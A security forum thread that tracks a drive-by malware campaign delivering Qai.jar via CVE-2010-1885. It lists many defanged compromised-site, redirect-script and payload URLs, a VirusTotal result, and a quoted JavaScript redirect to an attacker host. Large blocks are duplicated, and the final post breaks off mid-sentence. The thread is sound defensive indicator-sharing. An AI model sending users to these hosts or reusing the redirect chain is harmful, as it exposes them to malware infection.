Qai.jar malware (CVE-2010-1885)
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
Qai.jar malware (CVE-2010-1885)
A well-know spam expert is reporting an aggressively promoted malware exploit which uses multiple sites together. Deceptive web pages planted on dozens of sites load a set of JavaScripts which in turn attempt to load a malicious webpage. Several variations were detected yesterday and today.<!--break-->
This set of scripts
hXXp://50.57.29.172/hVg3GFAo/js.js
hXXp://finantariauto.ro/5ZqETXNE/js.js
hXXp://ipecturkey.com/E2UNfoGY/js.js
hXXp://oompa.de/VTwQKwDD/js.js
attempt to load
hXXp://209.59.217.193/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://209.59.217.193/q.php?f=ba33
hXXp://209.59.217.193/content/Qai.jar
This set of scripts
hXXp://216.205.49.67/CD5s3Ne3/js.js
hXXp://activetours.pttk.pl/Eaz0Mz8g/js.js
hXXp://copymax.gr/jbbaaFCK/js.js
hXXp://offvip.com/TtMQy1sw/js.js
hXXp://solocyberday.com/oDYibUuh/js.js
attempt to load
hXXp://slickicus.com/showthread.php?t=8d80b8c3f87a9538
that leads to malware at
hXXp://slickicus.com/q.php?f=db757
hXXp://slickicus.com/content/Qai.jar
This set of scripts
hXXp://officefurnituremart.com/sT1SFMyf/js.js
hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
hXXp://qqprints.com.my/37ErBpvj/js.js
hXXp://romanjewelers.com/mnbCaEYY/js.js
hXXp://samx.zzl.org/crF5iYsT/js.js
attempt to load
hXXp://slicksphere.com/showthread.php?t=d7ad916d1c0396ff
but the domain slicksphere.com has been suspended
Here are some of the deceptive URLs that have been reported earlier today
hXXp://02f40c1.netsolhost.com/jXh3opQk/index.html
hXXp://02f40c1.netsolhost.com/pVXky4P3/index.html
hXXp://184.164.129.5/H0PL9q26/index.html
hXXp://3eras.com/0X98aHUS/index.html
hXXp://5seis.com.ar/jXh3opQk/index.html
hXXp://91.93.110.150/JYjJE2q2/index.html
hXXp://acriancafeliz.org.br/vyEryYcH/index.html
hXXp://advanced-web-hosting-solutions.com/H0PL9q26/index.html
hXXp://advancedcopier.net/tMYwdbsB/index.html
hXXp://aerospacend.com/0X98aHUS/index.html
hXXp://autolorentzos.gr/46iU2yx2/index.html
hXXp://autolorentzos.gr/k4H1CSBf/index.html
hXXp://autouniversal.ro/tMYwdbsB/index.html
hXXp://bestdeal.com.vn/H0PL9q26/index.html
hXXp://binhanphat.vn/pVXky4P3/index.html
hXXp://chinchunhoo.com/tp3G2sKH/index.html
hXXp://criadero-duancos.com.ar/jXh3opQk/index.html
hXXp://dhtics.webou.net/8pe5eCMZ/index.html
hXXp://dhtics.webou.net/N7hwdmet/index.html
hXXp://dhtics.webou.net/vyEryYcH/index.html
hXXp://fundoohairstyles.com/0X98aHUS/index.html
hXXp://getstrength.com/pVXky4P3/index.html
hXXp://glamourspa.com.vn/H0PL9q26/index.html
hXXp://goksen.com.tr/H0PL9q26/index.html
hXXp://goksen.com.tr/JYjJE2q2/index.html
hXXp://goksen.com.tr/tp3G2sKH/index.html
hXXp://hajashaza.hu/JYjJE2q2/index.html
hXXp://hajashaza.hu/pVXky4P3/index.html
hXXp://hajashaza.hu/W9x9Xomw/index.html
hXXp://hellenic-antiaging-academy.gr/k4H1CSBf/index.html
hXXp://hidroprojekt-consult.hr/W9x9Xomw/index.html
hXXp://hippocrafts.com/46iU2yx2/index.html
hXXp://hippocrafts.com/8pe5eCMZ/index.html
hXXp://hippocrafts.com/svaVeSkm/index.html
hXXp://hyperbeesmedia.com/svaVeSkm/index.html
hXXp://ibafo.com.br/LTWJaNR9/index.html
hXXp://ibafo.com.br/N7hwdmet/index.html
hXXp://inour.biz/JYjJE2q2/index.html
hXXp://inour.biz/pVXky4P3/index.html
hXXp://isravilon1.com/tMYwdbsB/index.html
hXXp://junglecreativestudio.gr/k4H1CSBf/index.html
hXXp://jurjev.com/8pe5eCMZ/index.html
hXXp://koala.unas.cz/N7hwdmet/index.html
hXXp://kolling.com.my/LTWJaNR9/index.html
hXXp://kongo.co.hu/N7hwdmet/index.html
hXXp://kongo.co.hu/svaVeSkm/index.html
hXXp://kongo.co.hu/tMYwdbsB/index.html
hXXp://laflcargo.com/vyEryYcH/index.html
hXXp://laleyurtseven.com/8pe5eCMZ/index.html
hXXp://laleyurtseven.com/tMYwdbsB/index.html
hXXp://ledsociety.com/7ik7M03n/index.html
hXXp://ledsociety.com/tp3G2sKH/index.html
hXXp://leikar.net/vyEryYcH/index.html
hXXp://linemenu.com/8pe5eCMZ/index.html
hXXp://linemenu.com/svaVeSkm/index.html
hXXp://littlelordspreschool.com/0X98aHUS/index.html
hXXp://lsquarednetworks.com/7ik7M03n/index.html
hXXp://lsquarednetworks.com/tp3G2sKH/index.html
hXXp://mage.ibraggiotti.com/0X98aHUS/index.html
hXXp://mage.ibraggiotti.com/W9x9Xomw/index.html
hXXp://magneticlodestone.com/46iU2yx2/index.html
hXXp://magneticlodestone.com/tMYwdbsB/index.html
hXXp://maxiesolutions.com/svaVeSkm/index.html
hXXp://mayerdobrasil.com.br/W9x9Xomw/index.html
hXXp://mcms.xs2theworld.com/LTWJaNR9/index.html
hXXp://mcms.xs2theworld.com/vyEryYcH/index.html
hXXp://metrofincaraiz.com/0X98aHUS/index.html
hXXp://minds.com.pk/8pe5eCMZ/index.html
hXXp://mishelart.com/tp3G2sKH/index.html
hXXp://mixtle.com/tMYwdbsB/index.html
hXXp://mkultura.lt/7ik7M03n/index.html
hXXp://musicalchemylab.lh.pl/46iU2yx2/index.html
hXXp://myghanaonline.com/N7hwdmet/index.html
hXXp://notebooktamiri.gen.tr/vyEryYcH/index.html
hXXp://objebi.com/xBu5dukk/index.html
hXXp://olla-de-felix-buenos-aires.com/Qyuv8XX1/index.html
hXXp://olla-de-felix-buenos-aires.com/xBu5dukk/index.html
hXXp://oneblr.com/a65oSoKL/index.html
hXXp://optimizacija-seo.com/a65oSoKL/index.html
hXXp://overhill.comicgenesis.com/xBu5dukk/index.html
hXXp://paperbuzz.net/3BvC2cTf/index.html
hXXp://party-chat.hu/a65oSoKL/index.html
hXXp://party-chat.hu/xBu5dukk/index.html
hXXp://povilasc.ipower.com/tp3G2sKH/index.html
hXXp://pp.premiumpage.pl/vyEryYcH/index.html
hXXp://Privatesandbox.com/qVsVjYfe/index.html
hXXp://prodmovie.com/xBu5dukk/index.html
hXXp://psytrip.com.br/LTWJaNR9/index.html
hXXp://public.smartbe.be/0X98aHUS/index.html
hXXp://rajtr.com/7ik7M03n/index.html
hXXp://realestatebootcamp.ca/LTWJaNR9/index.html
hXXp://redencionsofro.com.ar/3BvC2cTf/index.html
hXXp://revivalgospelministries.org/LTWJaNR9/index.html
hXXp://riwex.hu/3BvC2cTf/index.html
hXXp://sarahyong.com/CzEjfCRK/index.html
hXXp://sereflikochisarzob.org/LTWJaNR9/index.html
hXXp://sezam.home.pl/CzEjfCRK/index.html
hXXp://silentstartupwebsite.com/CzEjfCRK/index.html
hXXp://silentstartupwebsite.com/xBu5dukk/index.html
hXXp://siranmuftulugu.gov.tr/46iU2yx2/index.html
hXXp://sisrs.org/tMYwdbsB/index.html
hXXp://sixdimensions.co.id/xBu5dukk/index.html
hXXp://softwarepark-galati.ro/xBu5dukk/index.html
hXXp://swcc.marknetdev.com/LTWJaNR9/index.html
hXXp://sxs-bwn.org/vyEryYcH/index.html
hXXp://techleadsolution.com/QnXBRiWS/index.html
hXXp://tehranmaltbeer.com/30VtVqEf/index.html
hXXp://tempo-www.defisduchott.com/CzEjfCRK/index.html
hXXp://themainmall.com/svaVeSkm/index.html
hXXp://transcamila.com/tMYwdbsB/index.html
hXXp://upedagogica.edu.bo/N7hwdmet/index.html
hXXp://www.tesan.com.tr/vyEryYcH/index.html
Some other reported URLs return HTTP 404 ("Not Found") or their domains have been suspended, so I suspect efforts are underway to combat the malware campaign.
This set of scripts
hXXp://50.57.29.172/hVg3GFAo/js.js
hXXp://finantariauto.ro/5ZqETXNE/js.js
hXXp://ipecturkey.com/E2UNfoGY/js.js
hXXp://oompa.de/VTwQKwDD/js.js
attempt to load
hXXp://209.59.217.193/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://209.59.217.193/q.php?f=ba33
hXXp://209.59.217.193/content/Qai.jar
This set of scripts
hXXp://216.205.49.67/CD5s3Ne3/js.js
hXXp://activetours.pttk.pl/Eaz0Mz8g/js.js
hXXp://copymax.gr/jbbaaFCK/js.js
hXXp://offvip.com/TtMQy1sw/js.js
hXXp://solocyberday.com/oDYibUuh/js.js
attempt to load
hXXp://slickicus.com/showthread.php?t=8d80b8c3f87a9538
that leads to malware at
hXXp://slickicus.com/q.php?f=db757
hXXp://slickicus.com/content/Qai.jar
This set of scripts
hXXp://officefurnituremart.com/sT1SFMyf/js.js
hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
hXXp://qqprints.com.my/37ErBpvj/js.js
hXXp://romanjewelers.com/mnbCaEYY/js.js
hXXp://samx.zzl.org/crF5iYsT/js.js
attempt to load
hXXp://slicksphere.com/showthread.php?t=d7ad916d1c0396ff
but the domain slicksphere.com has been suspended
Here are some of the deceptive URLs that have been reported earlier today
hXXp://02f40c1.netsolhost.com/jXh3opQk/index.html
hXXp://02f40c1.netsolhost.com/pVXky4P3/index.html
hXXp://184.164.129.5/H0PL9q26/index.html
hXXp://3eras.com/0X98aHUS/index.html
hXXp://5seis.com.ar/jXh3opQk/index.html
hXXp://91.93.110.150/JYjJE2q2/index.html
hXXp://acriancafeliz.org.br/vyEryYcH/index.html
hXXp://advanced-web-hosting-solutions.com/H0PL9q26/index.html
hXXp://advancedcopier.net/tMYwdbsB/index.html
hXXp://aerospacend.com/0X98aHUS/index.html
hXXp://autolorentzos.gr/46iU2yx2/index.html
hXXp://autolorentzos.gr/k4H1CSBf/index.html
hXXp://autouniversal.ro/tMYwdbsB/index.html
hXXp://bestdeal.com.vn/H0PL9q26/index.html
hXXp://binhanphat.vn/pVXky4P3/index.html
hXXp://chinchunhoo.com/tp3G2sKH/index.html
hXXp://criadero-duancos.com.ar/jXh3opQk/index.html
hXXp://dhtics.webou.net/8pe5eCMZ/index.html
hXXp://dhtics.webou.net/N7hwdmet/index.html
hXXp://dhtics.webou.net/vyEryYcH/index.html
hXXp://fundoohairstyles.com/0X98aHUS/index.html
hXXp://getstrength.com/pVXky4P3/index.html
hXXp://glamourspa.com.vn/H0PL9q26/index.html
hXXp://goksen.com.tr/H0PL9q26/index.html
hXXp://goksen.com.tr/JYjJE2q2/index.html
hXXp://goksen.com.tr/tp3G2sKH/index.html
hXXp://hajashaza.hu/JYjJE2q2/index.html
hXXp://hajashaza.hu/pVXky4P3/index.html
hXXp://hajashaza.hu/W9x9Xomw/index.html
hXXp://hellenic-antiaging-academy.gr/k4H1CSBf/index.html
hXXp://hidroprojekt-consult.hr/W9x9Xomw/index.html
hXXp://hippocrafts.com/46iU2yx2/index.html
hXXp://hippocrafts.com/8pe5eCMZ/index.html
hXXp://hippocrafts.com/svaVeSkm/index.html
hXXp://hyperbeesmedia.com/svaVeSkm/index.html
hXXp://ibafo.com.br/LTWJaNR9/index.html
hXXp://ibafo.com.br/N7hwdmet/index.html
hXXp://inour.biz/JYjJE2q2/index.html
hXXp://inour.biz/pVXky4P3/index.html
hXXp://isravilon1.com/tMYwdbsB/index.html
hXXp://junglecreativestudio.gr/k4H1CSBf/index.html
hXXp://jurjev.com/8pe5eCMZ/index.html
hXXp://koala.unas.cz/N7hwdmet/index.html
hXXp://kolling.com.my/LTWJaNR9/index.html
hXXp://kongo.co.hu/N7hwdmet/index.html
hXXp://kongo.co.hu/svaVeSkm/index.html
hXXp://kongo.co.hu/tMYwdbsB/index.html
hXXp://laflcargo.com/vyEryYcH/index.html
hXXp://laleyurtseven.com/8pe5eCMZ/index.html
hXXp://laleyurtseven.com/tMYwdbsB/index.html
hXXp://ledsociety.com/7ik7M03n/index.html
hXXp://ledsociety.com/tp3G2sKH/index.html
hXXp://leikar.net/vyEryYcH/index.html
hXXp://linemenu.com/8pe5eCMZ/index.html
hXXp://linemenu.com/svaVeSkm/index.html
hXXp://littlelordspreschool.com/0X98aHUS/index.html
hXXp://lsquarednetworks.com/7ik7M03n/index.html
hXXp://lsquarednetworks.com/tp3G2sKH/index.html
hXXp://mage.ibraggiotti.com/0X98aHUS/index.html
hXXp://mage.ibraggiotti.com/W9x9Xomw/index.html
hXXp://magneticlodestone.com/46iU2yx2/index.html
hXXp://magneticlodestone.com/tMYwdbsB/index.html
hXXp://maxiesolutions.com/svaVeSkm/index.html
hXXp://mayerdobrasil.com.br/W9x9Xomw/index.html
hXXp://mcms.xs2theworld.com/LTWJaNR9/index.html
hXXp://mcms.xs2theworld.com/vyEryYcH/index.html
hXXp://metrofincaraiz.com/0X98aHUS/index.html
hXXp://minds.com.pk/8pe5eCMZ/index.html
hXXp://mishelart.com/tp3G2sKH/index.html
hXXp://mixtle.com/tMYwdbsB/index.html
hXXp://mkultura.lt/7ik7M03n/index.html
hXXp://musicalchemylab.lh.pl/46iU2yx2/index.html
hXXp://myghanaonline.com/N7hwdmet/index.html
hXXp://notebooktamiri.gen.tr/vyEryYcH/index.html
hXXp://objebi.com/xBu5dukk/index.html
hXXp://olla-de-felix-buenos-aires.com/Qyuv8XX1/index.html
hXXp://olla-de-felix-buenos-aires.com/xBu5dukk/index.html
hXXp://oneblr.com/a65oSoKL/index.html
hXXp://optimizacija-seo.com/a65oSoKL/index.html
hXXp://overhill.comicgenesis.com/xBu5dukk/index.html
hXXp://paperbuzz.net/3BvC2cTf/index.html
hXXp://party-chat.hu/a65oSoKL/index.html
hXXp://party-chat.hu/xBu5dukk/index.html
hXXp://povilasc.ipower.com/tp3G2sKH/index.html
hXXp://pp.premiumpage.pl/vyEryYcH/index.html
hXXp://Privatesandbox.com/qVsVjYfe/index.html
hXXp://prodmovie.com/xBu5dukk/index.html
hXXp://psytrip.com.br/LTWJaNR9/index.html
hXXp://public.smartbe.be/0X98aHUS/index.html
hXXp://rajtr.com/7ik7M03n/index.html
hXXp://realestatebootcamp.ca/LTWJaNR9/index.html
hXXp://redencionsofro.com.ar/3BvC2cTf/index.html
hXXp://revivalgospelministries.org/LTWJaNR9/index.html
hXXp://riwex.hu/3BvC2cTf/index.html
hXXp://sarahyong.com/CzEjfCRK/index.html
hXXp://sereflikochisarzob.org/LTWJaNR9/index.html
hXXp://sezam.home.pl/CzEjfCRK/index.html
hXXp://silentstartupwebsite.com/CzEjfCRK/index.html
hXXp://silentstartupwebsite.com/xBu5dukk/index.html
hXXp://siranmuftulugu.gov.tr/46iU2yx2/index.html
hXXp://sisrs.org/tMYwdbsB/index.html
hXXp://sixdimensions.co.id/xBu5dukk/index.html
hXXp://softwarepark-galati.ro/xBu5dukk/index.html
hXXp://swcc.marknetdev.com/LTWJaNR9/index.html
hXXp://sxs-bwn.org/vyEryYcH/index.html
hXXp://techleadsolution.com/QnXBRiWS/index.html
hXXp://tehranmaltbeer.com/30VtVqEf/index.html
hXXp://tempo-www.defisduchott.com/CzEjfCRK/index.html
hXXp://themainmall.com/svaVeSkm/index.html
hXXp://transcamila.com/tMYwdbsB/index.html
hXXp://upedagogica.edu.bo/N7hwdmet/index.html
hXXp://www.tesan.com.tr/vyEryYcH/index.html
Some other reported URLs return HTTP 404 ("Not Found") or their domains have been suspended, so I suspect efforts are underway to combat the malware campaign.
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Other people are also reporting virtually the same exploit which is also running on other sites.
This set of scripts
hXXp://50.57.29.172/hVg3GFAo/js.js
hXXp://oompa.de/VTwQKwDD/js.js
attempts to load
hXXp://matormaster.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://matormaster.com/q.php?f=ba33e
hXXp://matormaster.com/content/Qai.jar
This set of scripts
hXXp://officefurnituremart.com/sT1SFMyf/js.js
hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
hXXp://romanjewelers.com/mnbCaEYY/js.js
hXXp://samx.zzl.org/crF5iYsT/js.js
attempts to load
hXXp://slickcurve.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://slickcurve.com/q.php?f=ba33
hXXp://slickcurve.com/content/Qai.jar
Here are some of the deceptive URLs that have been reported within the past few hours
hXXp://clubrepublique.com/LTWJaNR9/index.html
hXXp://gfclock.com/tMYwdbsB/index.html
hXXp://maxiesolutions.com/N7hwdmet/index.html
hXXp://orangesoft.co.uk/xBu5dukk/index.html
hXXp://palm-schools.com/xBu5dukk/index.html
hXXp://paperbuzz.net/xBu5dukk/index.html
hXXp://parfum-mester.hu/a65oSoKL/index.html
hXXp://parfum-sziget.hu/a65oSoKL/index.html
hXXp://party-chat.hu/3BvC2cTf/index.html
hXXp://photo-howto.com/a65oSoKL/index.html
hXXp://popi-indonesia.org/Qyuv8XX1/index.html
hXXp://probatik.com/3BvC2cTf/index.html
hXXp://psytrip.com.br/8pe5eCMZ/index.html
hXXp://riwex.hu/30VtVqEf/index.html
hXXp://riwex.hu/a65oSoKL/index.html
hXXp://saturnosistemas.com/xBu5dukk/index.html
hXXp://sezam.home.pl/a65oSoKL/index.html
hXXp://silentstartupwebsite.com/a65oSoKL/index.html
hXXp://sinarled.com/CzEjfCRK/index.html
hXXp://sreesaiproperty.com/CzEjfCRK/index.html
hXXp://szomaliaiegyesulet.hu/30VtVqEf/index.html
hXXp://tamanbungaku.com/a65oSoKL/index.html
hXXp://tanyaeco.co.za/30VtVqEf/index.html
hXXp://terangkecil.com/3BvC2cTf/index.html
hXXp://thechange180.com/a65oSoKL/index.html
This set of scripts
hXXp://50.57.29.172/hVg3GFAo/js.js
hXXp://oompa.de/VTwQKwDD/js.js
attempts to load
hXXp://matormaster.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://matormaster.com/q.php?f=ba33e
hXXp://matormaster.com/content/Qai.jar
This set of scripts
hXXp://officefurnituremart.com/sT1SFMyf/js.js
hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
hXXp://romanjewelers.com/mnbCaEYY/js.js
hXXp://samx.zzl.org/crF5iYsT/js.js
attempts to load
hXXp://slickcurve.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://slickcurve.com/q.php?f=ba33
hXXp://slickcurve.com/content/Qai.jar
Here are some of the deceptive URLs that have been reported within the past few hours
hXXp://clubrepublique.com/LTWJaNR9/index.html
hXXp://gfclock.com/tMYwdbsB/index.html
hXXp://maxiesolutions.com/N7hwdmet/index.html
hXXp://orangesoft.co.uk/xBu5dukk/index.html
hXXp://palm-schools.com/xBu5dukk/index.html
hXXp://paperbuzz.net/xBu5dukk/index.html
hXXp://parfum-mester.hu/a65oSoKL/index.html
hXXp://parfum-sziget.hu/a65oSoKL/index.html
hXXp://party-chat.hu/3BvC2cTf/index.html
hXXp://photo-howto.com/a65oSoKL/index.html
hXXp://popi-indonesia.org/Qyuv8XX1/index.html
hXXp://probatik.com/3BvC2cTf/index.html
hXXp://psytrip.com.br/8pe5eCMZ/index.html
hXXp://riwex.hu/30VtVqEf/index.html
hXXp://riwex.hu/a65oSoKL/index.html
hXXp://saturnosistemas.com/xBu5dukk/index.html
hXXp://sezam.home.pl/a65oSoKL/index.html
hXXp://silentstartupwebsite.com/a65oSoKL/index.html
hXXp://sinarled.com/CzEjfCRK/index.html
hXXp://sreesaiproperty.com/CzEjfCRK/index.html
hXXp://szomaliaiegyesulet.hu/30VtVqEf/index.html
hXXp://tamanbungaku.com/a65oSoKL/index.html
hXXp://tanyaeco.co.za/30VtVqEf/index.html
hXXp://terangkecil.com/3BvC2cTf/index.html
hXXp://thechange180.com/a65oSoKL/index.html
RE: Qai.jar malware (CVE-2010-1885)
Qai.jar - 17.07 KB
[url=https://www.virustotal.com/file/dfd851768ad579fe0dddff9f1d88305f066d7313bd09cdbfd0122e93da379fab/analysis/ t=_self]VT 0/43[/url]
contents:
ua.class - 1.04 KB
cons.class - 4.27 KB
cr.class - 2.3 KB
G.class - 3.35 KB
ub.class - 15.63 KB
uc.class - 389 Byte
sys.class - 313 Byte
results with 404 not found
[/i]
50.57.29.172/hVg3GFAo/js.js
oompa.de/VTwQKwDD/js.js
officefurnituremart.com/sT1SFMyf/js.js
orvosokafrikaert.hu/Bsz1CQg0/js.js
romanjewelers.com/mnbCaEYY/js.js
samx.zzl.org/crF5iYsT/js.js
results with:
[/i]
slickcurve.com resides on IP:173.255.195.167
results with same malware install
50.57.29.172
173.255.195.167
oompa.de
officefurnituremart.com
orvosokafrikaert.hu
romanjewelers.com
samx.zzl.org
slickcurve.com
[url=https://www.virustotal.com/file/dfd851768ad579fe0dddff9f1d88305f066d7313bd09cdbfd0122e93da379fab/analysis/ t=_self]VT 0/43[/url]
contents:
ua.class - 1.04 KB
cons.class - 4.27 KB
cr.class - 2.3 KB
G.class - 3.35 KB
ub.class - 15.63 KB
uc.class - 389 Byte
sys.class - 313 Byte
results with 404 not found
Code: Select all
matormaster.com/content/Qai.jar
matormaster.com/q.php?f=ba33e
50.57.29.172/hVg3GFAo/js.js
oompa.de/VTwQKwDD/js.js
officefurnituremart.com/sT1SFMyf/js.js
orvosokafrikaert.hu/Bsz1CQg0/js.js
romanjewelers.com/mnbCaEYY/js.js
samx.zzl.org/crF5iYsT/js.js
results with:
Code: Select all
document.location='http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff';
slickcurve.com resides on IP:173.255.195.167
Code: Select all
hXXp://173.255.195.167/showthread.php?t=d7ad916d1c0396ff
50.57.29.172
173.255.195.167
oompa.de
officefurnituremart.com
orvosokafrikaert.hu
romanjewelers.com
samx.zzl.org
slickcurve.com
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Spam email, transmitted via IP 82.127.14.217 (abo.wanadoo.fr), fraudulently claims to be a LinkIn notice. IP 82.127.14.217 may be blacklisted. The email contains a deceptive URL to a webpage at
hXXp://butelii-acetilena.ro/59N0J8h1/index.html
which attempts to load JavaScript from two sources
hXXp://interspeedy.com.br/zjSxmkDM/js.js
hXXp://limbongan.com/37hcGs54/js.js
The scripts, in turn, attempt to redirect to a malicious web page at
hXXp://bluecellular.com/showthread.php?t=977334ca118fcb8c
that leads to malware at
hXXp://bluecellular.com/content/Qai.jar
hXXp://bluecellular.com/q.php?f=2e457
The email contains two more suspicious URL which are either fakes or already have been disabled (HTTP 404):
http://inepalhotels.com/y7id9XXo/index.html
http://cgwood.net/U6PcaTcQ/index.html
[Edit: more]
Other malicious scripts that redirct to bluecellular.com are at
hXXp://muttonheadcollective.com/XvLBzokA/js.js
hXXp://auto-escolas.com/TfFQ7r6J/js.js
hXXp://rgexcel.com/CPD4MoEs/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://vita-shop.hu/dSSjc0ag/js.js
hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
hXXp://butelii-acetilena.ro/59N0J8h1/index.html
which attempts to load JavaScript from two sources
hXXp://interspeedy.com.br/zjSxmkDM/js.js
hXXp://limbongan.com/37hcGs54/js.js
The scripts, in turn, attempt to redirect to a malicious web page at
hXXp://bluecellular.com/showthread.php?t=977334ca118fcb8c
that leads to malware at
hXXp://bluecellular.com/content/Qai.jar
hXXp://bluecellular.com/q.php?f=2e457
The email contains two more suspicious URL which are either fakes or already have been disabled (HTTP 404):
http://inepalhotels.com/y7id9XXo/index.html
http://cgwood.net/U6PcaTcQ/index.html
[Edit: more]
Other malicious scripts that redirct to bluecellular.com are at
hXXp://muttonheadcollective.com/XvLBzokA/js.js
hXXp://auto-escolas.com/TfFQ7r6J/js.js
hXXp://rgexcel.com/CPD4MoEs/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://vita-shop.hu/dSSjc0ag/js.js
hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
bluecellular.com has been suspended; its domain registrar has set its status to clientHold. The malware exploit is now using the newly registered browncellular.com instead.
hXXp://174.133.92.122/MgGsg1Pp/js.js
hXXp://myparacord.com/cxW8X8xp/js.js
hXXp://prace.kupbilet.com/VTDeZmRF/js.js
hXXp://smapit.com/TaTj4D3f/js.js
hXXp://thebestguide1.com/arKwG4pE/js.js
hXXp://www.aeceventos.com.br/zEQSTHfq/js.js
hXXp://www.extrhema.com.br/cVspcegd/js.js
hXXp://www.industriacaxiense.com.br/HLAeMSAd/js.js
hXXp://www.inkontro.com/CXxLMToy/js.js
hXXp://www.inkontro.it/9e85Bru8/js.js
hXXp://www.teodo-tivat.com/osJYHU6u/js.js
hXXp://mrsmakeit.com/9jrgDjED/js.js
attempt to redirect to a malicious web page at
hXXp://browncellular.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://browncellular.com/content/Qai.jar
hXXp://browncellular.com/content/ap2.php?f=7245d
hXXp://174.133.92.122/MgGsg1Pp/js.js
hXXp://myparacord.com/cxW8X8xp/js.js
hXXp://prace.kupbilet.com/VTDeZmRF/js.js
hXXp://smapit.com/TaTj4D3f/js.js
hXXp://thebestguide1.com/arKwG4pE/js.js
hXXp://www.aeceventos.com.br/zEQSTHfq/js.js
hXXp://www.extrhema.com.br/cVspcegd/js.js
hXXp://www.industriacaxiense.com.br/HLAeMSAd/js.js
hXXp://www.inkontro.com/CXxLMToy/js.js
hXXp://www.inkontro.it/9e85Bru8/js.js
hXXp://www.teodo-tivat.com/osJYHU6u/js.js
hXXp://mrsmakeit.com/9jrgDjED/js.js
attempt to redirect to a malicious web page at
hXXp://browncellular.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://browncellular.com/content/Qai.jar
hXXp://browncellular.com/content/ap2.php?f=7245d
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Deceptive URLs at
hXXp://espacoquatro.com.br/3qZfYFbh/index.html
hXXp://sauschamber.com/sgc1MBef/index.html
load scripts from some of all of the following sources
hXXp://skueez.com/jKtfRnuL/js.js
hXXp://nhb.prosixsoftron.in/cJHrkMSb/js.js
hXXp://boemelparty.be/vnB4GozT/js.js
hXXp://www.alpine-turkey.com/YfTXsaR5/js.js
hXXp://sas.hg.pl/Th5Da66c/js.js
hXXp://www.vinhthanh.com.vn/8cACpVEr/js.js
that attempt to redirect to a malicious web page at
hXXp://cyancellular.com/showthread.php?t=d44175c6da768b70
that, in turn, leads to malware at
hXXp://cyancellular.com/content/Qai.jar
hXXp://cyancellular.com/q.php?f=44c23
Acknowledgement: I saw most of the URLs listed in this comment in the current malwaredomainlist.com report.
hXXp://espacoquatro.com.br/3qZfYFbh/index.html
hXXp://sauschamber.com/sgc1MBef/index.html
load scripts from some of all of the following sources
hXXp://skueez.com/jKtfRnuL/js.js
hXXp://nhb.prosixsoftron.in/cJHrkMSb/js.js
hXXp://boemelparty.be/vnB4GozT/js.js
hXXp://www.alpine-turkey.com/YfTXsaR5/js.js
hXXp://sas.hg.pl/Th5Da66c/js.js
hXXp://www.vinhthanh.com.vn/8cACpVEr/js.js
that attempt to redirect to a malicious web page at
hXXp://cyancellular.com/showthread.php?t=d44175c6da768b70
that, in turn, leads to malware at
hXXp://cyancellular.com/content/Qai.jar
hXXp://cyancellular.com/q.php?f=44c23
Acknowledgement: I saw most of the URLs listed in this comment in the current malwaredomainlist.com report.
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
A deceptive URL at
hXXp://www.kozmodisk.net/enzfjWNu/index.html
loads scripts from all of the following sources
hXXp://auto-escolas.com/TfFQ7r6J/js.js
hXXp://muttonheadcollective.com/XvLBzokA/js.js
hXXp://rgexcel.com/CPD4MoEs/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://vita-shop.hu/dSSjc0ag/js.js
hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
that attempt to redirect to a malicious web page at
hXXp://purplecellular.org/showthread.php?t=d7ad916d1c0396ff
that leads to a suspicious file at
hXXp://purplecellular.org/content/Qai.jar
hXXp://www.kozmodisk.net/enzfjWNu/index.html
loads scripts from all of the following sources
hXXp://auto-escolas.com/TfFQ7r6J/js.js
hXXp://muttonheadcollective.com/XvLBzokA/js.js
hXXp://rgexcel.com/CPD4MoEs/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://vita-shop.hu/dSSjc0ag/js.js
hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
that attempt to redirect to a malicious web page at
hXXp://purplecellular.org/showthread.php?t=d7ad916d1c0396ff
that leads to a suspicious file at
hXXp://purplecellular.org/content/Qai.jar
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Currently, many of the malware exploit's intermediary JavaScript files, including these
hXXp://thebestguide1.com/arKwG4pE/js.js
hXXp://www.extrhema.com.br/cVspcegd/js.js
hXXp://mrsmakeit.com/9jrgDjED/js.js
redirect to a malicious webpage at
hXXp://whitecellular.org/showthread.php?t=d7ad916d1c0396ff
which leads to the suspicious file
